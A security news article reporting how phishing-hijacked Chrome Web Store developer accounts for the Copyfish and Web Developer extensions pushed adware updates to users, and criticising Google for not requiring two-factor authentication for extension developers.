Compromised accounts push fraudulent extension updates to unsuspecting users.

Twice in five days, developers of Chrome browser extensions have lost control of their code after unidentified attackers compromised the Google Chrome Web Store accounts used to issue updates.

The most recent case happened Wednesday to Chris Pederick, creator of the Web Developer extension. Last Friday, developers of Copy Fish, a browser extension that performs optical character recognition, also had their account hijacked.

In both cases, the attackers used the unauthorized access to publish fraudulent updates that by default are automatically pushed to all Chrome users who have the extensions installed. The tainted extensions were also available for download in Google's official Chrome Web Store. Both Pederick and the Copyfish developers said the fraudulent updates did nothing more than inject ads into the sites users visited. The Copyfish developers provided this account that provided a side-by-side comparison of the legitimate and altered code. Pederick has so far not provided documentation of the changes that were pushed out to the more than one million browsers that have downloaded the Web Developer extension.

Converting a useful browser extension into adware is generally little more than an annoyance. Still, the incidents underscore a serious weakness in Chrome, which is widely regarded among security professionals as the safest browser to use. Previous abuse of the Google Chrome Web Store shows that criminals who can modify legitimate extension code can use that capability to take control of social media accounts, execute malicious code, and collect browsing histories and user data.
Low-hanging fruit

Google has poured hundreds of millions of dollars into fortifying the security of Chrome, making it resistant to the kinds of drive-by attacks that used to be common and still happen on occasion to competing browsers. But two Chrome extension account hijackings in five days suggest that extensions are one of the more effective ways attackers can target Chrome users.

In blog-post comments and in an e-mail to Ars, officials with Copyfish developer A9t9 Software said the account used to distribute the Chrome extension wasn't protected by two-factor authentication, which Google provides for free. (The A9t9 Software account now uses the added protection of two-factor authentication.) The account was compromised after a company employee clicked on a link in a phishing e-mail that purported to be from Google. Shortly after the employee entered the account password into the fraudulent Web page that appeared, the Copyfish account was taken over. A day later, the Copyfish extension was updated with the adware.

Chris Pederick, the developer of the Web Developer extension, said on Twitter that his account was also hijacked through phishing. He didn't respond to an e-mail seeking comment for this post.

A Google spokeswoman told Ars that two-factor authentication isn't mandatory for extension developers; she didn't respond to a follow-up question asking why the additional security is optional.

It's understandable that Google doesn't make two-factor authentication mandatory for all account holders. But given Chrome's track record with security, it's surprising that the company doesn't require the added protection for extension developers, who—because of their ability to push code onto millions of users' computers—represent high-value targets to criminals.

Truly security-conscious users should remember this limitation when deciding whether to install Chrome extensions.